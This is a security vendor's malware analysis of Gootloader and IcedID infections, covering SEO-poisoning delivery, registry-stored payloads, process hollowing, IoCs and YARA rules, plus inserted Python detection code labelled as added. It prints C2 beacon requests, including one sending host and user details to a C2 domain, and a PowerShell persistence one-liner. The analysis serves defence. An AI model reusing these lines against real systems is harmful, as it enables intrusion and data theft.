Gootloader is a Malware-as-a-Service (MaaS) offering that is spread through Search Engine Optimization (SEO) poisoning to distribute malicious payloads, such as IcedID. Threat actors have begun using IcedID, a former banking trojan, since it’s a stealthier option compared to Cobalt Strike.
In fact, the eSentire Threat Response Unit (TRU) team recently published a security advisory, The Popular Malware Downloader, GootLoader, Expands its Payloads Yet Again, Infecting a Law Firm with IcedID, that outlined TRU’s discovery of threat actors deploying IcedID onto a law firm’s IT environment via an employee’s computer. However, our team of 24/7 Cyber SOC Analysts immediately isolated the infected endpoint and worked with TRU to diagnose the malware as IcedID after cleaning the endpoint.
This malware analysis is a deeper technical dive of how Gootloader and IcedID are deployed and our security recommendations to protect your organization from being exploited.
Key Takeaways
- Gootloader is a sophisticated malware, which, upon communication with a C2 server, serves the second-stage payload only for machines that are a part of the Active Directory.
- The threat actor(s) has been switching between delivering Cobalt Strike and IcedID as a second-stage payload. eSentire’s Threat Response Unit (TRU) team assesses with high confidence that threat actors are delivering IcedID, instead of Cobalt Strike as a second stage, as it is a stealthier option to avoid the detection.
- Gootloader has been observed dropping Cobalt Strike payloads under the HKCU\SOFTWARE\Microsoft\Phone\username0 and HKCU\SOFTWARE\Microsoft\Phone\username registry keys.
- Gootloader has been observed dropping IcedID payloads under the HKCU\SOFTWARE\Microsoft\username and HKCU\SOFTWARE\Microsoft\username0 registry keys.
- Gootloader uses a process hollowing technique to inject the IcedID loader into PowerShell processes. PowerShell is routinely used by legitimate processes running in the background; thus, Gootloader infections can go unnoticed.
- To secure your organization against Gootloader and IcedID, eSentire’s Threat Response Unit (TRU) team recommends:
  - Implement a Phishing and Security Awareness Training (PSAT) program that educates and informs employees on emerging threats in the threat landscape.
  - Confirm that all devices are protected with Endpoint Detection and Response (EDR) solutions.
  - Address security issues in Active Directory by thoroughly reviewing and securing SYSVOL permissions, patching any known vulnerabilities, and implementing Least-Privilege administrative models.
  - Ensure standard procedures are in place for employees to submit potentially malicious content for review.
Case Study
eSentire’s Threat Response Unit (TRU) team has recently observed multiple Gootloader infections. One notable Gootloader incident delivered an IcedID loader. The malware targets domain-joined machines. The infection starts when the user visits a compromised website that lures them into downloading a ZIP file. The ZIP archive contains a malicious JavaScript file responsible for reaching out to one of three hardcoded domains to retrieve the second-stage payload.
Gootloader and IcedID Technical Analysis
As mentioned previously, the infection starts when a user visits an infected website and downloads a ZIP archive which contains a highly obfuscated malicious JavaScript file. The filename in most cases includes the keyword “agreement”. Gootloader leverages SEO poisoning to deliver the initial payload as shown in Exhibit 1.
When visiting one of the many compromised websites, the user is served a Gootloader landing page that includes the link to the malicious ZIP archive (Figure 2). Since the user’s location and browser information are recorded during the visit, a user who later visits another infected webpage will not be served a second Gootloader payload.
The JavaScript file within the ZIP archive decodes itself at runtime and reaches out to one of the three hardcoded compromised websites.
The script checks whether the infected host is part of an Active Directory domain by reading the environment variable %USERDNSDOMAIN%, which holds the FQDN (fully qualified domain name) of the computer. If the infected host successfully logs on to one of the malicious domains, the value “4173581” is appended to the URL of the GET request sent to the C2 server. If one of the C2 servers provided in the L parameter doesn’t respond with status code 200, the script sleeps for 23.232 seconds (23232 milliseconds) and attempts to connect to the next URL (Exhibit 3).
The GET request (on a domain joined machine):
GET /test.php?cvtbyyxsqwsw=201492074208614154173581 HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: www[.]liveshopping-aktuell[.]de
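As an added illustration (this is not code from the eSentire advisory), the following Python flags requests in proxy logs that match the beacon shape shown above: the WinHttpRequest User-Agent, a single long all-numeric query value, and the “4173581” suffix that marks a domain-joined host. The log lines and their 000/200 status values are constructed; the C2 hostnames are the defanged ones listed in the IoC appendix, and the digits preceding the suffix are left undecoded because the page does not describe them.

```python
import re

# Constructed proxy log lines (not from the page): "<time> <client> <method> <url> <status> "<user-agent>""
SAMPLE_LOG = """\
2022-05-30T14:02:11 10.0.0.15 GET http://www[.]lintelconsulting[.]co[.]uk/test.php?cvtbyyxsqwsw=201492074208614154173581 000 "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
2022-05-30T14:02:34 10.0.0.15 GET http://www[.]liveshopping-aktuell[.]de/test.php?cvtbyyxsqwsw=201492074208614154173581 200 "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
2022-05-30T14:03:00 10.0.0.22 GET http://example.invalid/index.php?page=3 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
"""

LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')
GOOTLOADER_UA = "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
DOMAIN_JOINED_SUFFIX = "4173581"  # appended to the query value on domain-joined hosts
# One .php script, one lowercase parameter name, one long run of digits and nothing else
BEACON_RE = re.compile(r"^https?://([^/]+)/\w+\.php\?([a-z]+)=(\d{12,})$")

def classify_request(url, user_agent):
    """Return beacon details if the request looks like the Gootloader GET above, else None."""
    m = BEACON_RE.match(url)
    if not m or user_agent != GOOTLOADER_UA:
        return None
    host, param, value = m.groups()
    return {"host": host, "param": param, "domain_joined": value.endswith(DOMAIN_JOINED_SUFFIX)}

def find_beacons(log_text):
    """Scan log lines and return every Gootloader-like beacon with its client, time and status."""
    found = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ts, client, _method, url, status, ua = m.groups()
        hit = classify_request(url, ua)
        if hit:
            found.append({"time": ts, "client": client, "status": int(status), **hit})
    return found

def summarize(beacons):
    """Per client: C2 hosts tried in order, and whether any answered 200 (second stage likely served)."""
    out = {}
    for b in beacons:
        entry = out.setdefault(b["client"], {"hosts": [], "served": False, "domain_joined": False})
        if b["host"] not in entry["hosts"]:
            entry["hosts"].append(b["host"])
        entry["served"] = entry["served"] or b["status"] == 200
        entry["domain_joined"] = entry["domain_joined"] or b["domain_joined"]
    return out
```

A client whose summary shows served=True and domain_joined=True is the one to isolate first, since the page notes the second stage lands within two minutes of a successful response.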
Upon successful communication with the C2 channel, Gootloader serves the second-stage payloads to the infected host from one of the infected websites in less than 2 minutes from the execution of the JavaScript file. The first, main encoded payload is written to the registry key under HKEY_CURRENT_USER\SOFTWARE\Microsoft\username by the WScript process using the RegWrite method (Exhibits 4-5).
The second payload is written to HKEY_CURRENT_USER\SOFTWARE\Microsoft\username0 (Exhibit 6). The payload is a 32-bit DLL (Dynamic Link Library) written in C# and named powershell.dll. The C# payload is responsible for decoding the main payload by replacing ASCII characters with numeric values within the Test() Class (Exhibit 7).
eSentire TRU previously observed Gootloader writing Cobalt Strike payloads under the HKEY_CURRENT_USER\SOFTWARE\Microsoft\Phone\username0 and HKEY_CURRENT_USER\SOFTWARE\Microsoft\Phone\username registry keys.
Gootloader uses a process hollowing technique (i.e., replacing the legitimate executable section of a process with malicious code by hollowing or unmapping its memory) to inject the main payload into a PowerShell process via the Foad() Class, using APIs such as ZwUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory and ResumeThread, as shown in Exhibit 8. Previously, GootLoader was observed injecting the payloads into the ImagingDevice.exe process.
In some cases, we have observed a scheduled task created as a persistence mechanism; it decodes the registry values by replacing “#” with “1000” and reflectively loads the second decoder payload in memory. The script is base64-encoded and executed via PowerShell (Exhibits 9-10).
The following code block is responsible for creating the scheduled task (the scheduled task is named after the username):
$yl=$env:USERNAME;Register-ScheduledTask $yl -In (New-ScheduledTask -Ac (New-ScheduledTaskAction -E $ibs -Ar $zb) -Tr (New-ScheduledTaskTrigger -AtL -U $yl))
eSentire TRU was able to identify the main payload as IcedID.
IcedID Analysis
The sample was compiled on May 25th, 2022, five days before the infection. The packed sample is 147 KB in size (MD5: 157d12885e5f6434436862aadd6224cd). The executable was compiled using MinGW GCC. The unpacked sample is only 16 KB in size (MD5: 578143ef946796590c0dd5f5dcfdada7).
IcedID performs anti-VM/anti-sandboxing checks to detect whether it’s running in a sandbox environment, using the RDTSC (Read Time Stamp Counter) instruction to read the processor’s time stamp counter, together with CPUID and SwitchToThread in a loop, so that execution times can be measured accurately (Exhibit 11).
IcedID gathers information on the infected machine and transfers it via the Cookie parameter of a GET request, as shown below:
GET / HTTP/1.1
Connection: Keep-Alive
Cookie: __gads=1073741824:1:352:136; __gat=10.0.19043.64; _ga=1.591597.1635208534.1946; _u=4445534B544F502D5043373941514B:73616C6573; __io=21_3122393604_3742086262_449295377; _gid=0068595A4472
Host: ilekvoyn[dot]com
Breakdown of the Cookie parameters:
- __gads – carries the IcedID campaign ID (it’s worth noting that the campaign IDs from the extracted configuration are different from the one that gets sent out to the C2), the flag, the number of milliseconds elapsed since system startup (using the GetTickCount function) and system information (using ZwQuerySystemInformation).
- __gat – the OS version (retrieved using the RtlGetVersion function), as shown in Exhibit 12.
- _ga – the processor information retrieved using the CPUID instruction and the Hypervisor Vendor information, as shown in Exhibit 13.
- _u – the computer name and username retrieved via the GetComputerNameExW and GetUserNameW functions and stored in hexadecimal format (Exhibit 14).
- __io – the user security identifier (SID).
- _gid – the network adapter information retrieved via GetAdaptersInfo (Exhibit 15).
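As an added example (not code from the advisory), this Python parses a Cookie header with the layout broken down above, decodes the hex-encoded computer name and username in _u, and rejects headers that do not carry exactly this key set, which is the same combination the IcedID_loader YARA rule in the appendix keys on. Rendering _gid as a MAC address is an assumption; the page only says the field carries network adapter information.

```python
import binascii
import re

# The Cookie header shown on the page, reused here as the sample input
SAMPLE_COOKIE = ("__gads=1073741824:1:352:136; __gat=10.0.19043.64; _ga=1.591597.1635208534.1946; "
                 "_u=4445534B544F502D5043373941514B:73616C6573; "
                 "__io=21_3122393604_3742086262_449295377; _gid=0068595A4472")

ICEDID_KEYS = {"__gads", "__gat", "_ga", "_u", "__io", "_gid"}
HEX_RE = re.compile(r"^[0-9A-Fa-f]+$")

def _hex_ascii(h):
    """Decode a hex string to printable ASCII; raise ValueError on anything else."""
    text = binascii.unhexlify(h).decode("ascii")
    if not text.isprintable():
        raise ValueError("non-printable content")
    return text

def parse_icedid_cookie(cookie_header):
    """Return decoded beacon fields if the header matches the IcedID layout, else None."""
    pairs = [p.split("=", 1) for p in cookie_header.split("; ")]
    if any(len(p) != 2 for p in pairs):
        return None
    fields = dict(pairs)
    if set(fields) != ICEDID_KEYS:          # any extra or missing key: not this beacon
        return None
    try:
        gads = [int(x) for x in fields["__gads"].split(":")]
        if len(gads) != 4:
            return None
        host_hex, user_hex = fields["_u"].split(":")
        hostname, username = _hex_ascii(host_hex), _hex_ascii(user_hex)
    except (ValueError, UnicodeDecodeError, binascii.Error):
        return None
    gid = fields["_gid"]
    # Assumption: 12 hex digits look like a MAC address; the page only says "network adapter information"
    mac = ":".join(gid[i:i + 2] for i in range(0, 12, 2)) if len(gid) == 12 and HEX_RE.match(gid) else None
    return {
        "campaign_id": gads[0], "flag": gads[1], "uptime_ms": gads[2], "system_info": gads[3],
        "os_version": fields["__gat"],
        "cpu_hypervisor": fields["_ga"],     # CPUID / hypervisor vendor data, left undecoded
        "hostname": hostname, "username": username,
        "sid_raw": fields["__io"],           # SID material, kept as transmitted
        "adapter_hex": gid, "adapter_as_mac": mac,
    }
```

Feeding decoded hostname and username back into the host's own inventory is the quickest confirmation that a proxy hit is a real beacon from that machine rather than a sandbox replay.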
After successfully connecting to the C2 server, IcedID drops the payload in ProgramData folder (Exhibits 16-17).
As we can see, the unpacked IcedID payload is relatively small, but it contains the capabilities the threat actor(s) need to deploy a secondary payload from the C2 server. IcedID has been observed delivering Cobalt Strike, Conti ransomware, Quantum ransomware, and XingLocker ransomware in the past.
How eSentire is Responding
Our Threat Response Unit (TRU) combines threat intelligence obtained from research and security incidents to create positive security outcomes for our customers. We take a holistic approach to combat modern cybersecurity threats by deploying countermeasures, such as:
- Implementing threat detections and BlueSteel, our machine-learning powered PowerShell classifier, to identify malicious command execution and exploitation attempts, and ensuring that eSentire has visibility and detections in place across eSentire MDR for Endpoint and MDR for Network.
- Performing global threat hunts for indicators associated with Gootloader and IcedID.
Our detection content is supported by investigation runbooks, ensuring our 24/7 Cyber SOC Analysts respond rapidly to any intrusion attempts related to known malware Tactics, Techniques, and Procedures (TTPs). In addition, TRU closely monitors the threat landscape, constantly addresses capability gaps, and conducts retroactive threat hunts to assess customer impact.
Recommendations from eSentire’s Threat Response Unit (TRU)
We recommend implementing the following controls to help secure your organization against Gootloader and IcedID malware:
- Address security issues in Active Directory by thoroughly reviewing and securing SYSVOL permissions, patching any known vulnerabilities, and implementing Least-Privilege administrative models.
- Ensure standard procedures are in place for employees to submit potentially malicious content for review.
While the TTPs used by adversaries grow in sophistication, they create a level of difficulty at which critical business decisions must be made. Preventing the various attack paths used by the modern threat actor requires actively monitoring the threat landscape, developing and deploying endpoint detections, and the ability to investigate logs and network data during active intrusions.
eSentire’s TRU is a world-class team of threat researchers who develop new detections enriched by original threat intelligence and leverage new machine learning models that correlate multi-signal data and automate rapid response to advanced threats.
If you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and put your business ahead of disruption.
Learn what it means to have an elite team of Threat Hunters and Researchers that works for you. Connect with an eSentire Security Specialist.
Appendix
Indicators of Compromise
| Name | Indicator |
| IcedID packed payload | 157d12885e5f6434436862aadd6224cd |
| IcedID unpacked payload | 578143ef946796590c0dd5f5dcfdada7 |
| IcedID C2 | ilekvoyn[dot]com |
| Gootloader C2 | www[dot]liveshopping-aktuell[dot]de |
| Gootloader C2 | www[dot]lightnessofbeing[dot]net |
| Gootloader C2 | www[dot]lintelconsulting[dot]co[dot]uk |
| employee confidentiality agreement texas(9898).zip – Gootloader initial payload (ZIP archive) | 1c822f5a7d92307f9cf8ad5f28f61a76 |
| employee_confidentiality_agreement_texas 19855.js – Gootloader initial payload (JavaScript file) | c6bac95375b8c7fb3b16c7dff98d2cc0 |
| IcedID campaign ID | 277708695 |
Yara Rules
rule gootloader_JS {
    meta:
        description = "Detects Gootloader JavaScript file"
        author = "eSentire TI"
        date = "06/13/2022"
    strings:
        $a = "w+"
        $a1 = "x"
        $a2 = "Sp"
        $a3 = "E"
        $a4 = "function"
        $a5 = "while"
    condition:
        all of ($a*) and filesize < 300KB
}

rule IcedID_loader {
    meta:
        description = "Detects IcedID loader"
        author = "eSentire TI"
        date = "06/13/2022"
    strings:
        $a = "oCookie: _s=" wide fullword nocase
        $a1 = "Cookie: __gads=" wide fullword nocase
        $a2 = "oCookie: _s=" wide fullword nocase
        $a3 = "__io=" wide fullword nocase
        $a4 = {63 3A 5C 50 72 6F 67 72 61 6D 44 61 74 61 5C}
        $a5 = {3B 00 20 00 5F 00 67 00 61 00 3D}
        $a6 = {3B 00 20 00 5F 00 67 00 69 00 64 00 3D}
        $a7 = {3B 00 20 00 5F 00 67 00 61 00 74 00 3D}
    condition:
        all of ($a*) and filesize < 20KB
}
Source: https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-gootloader-and-icedid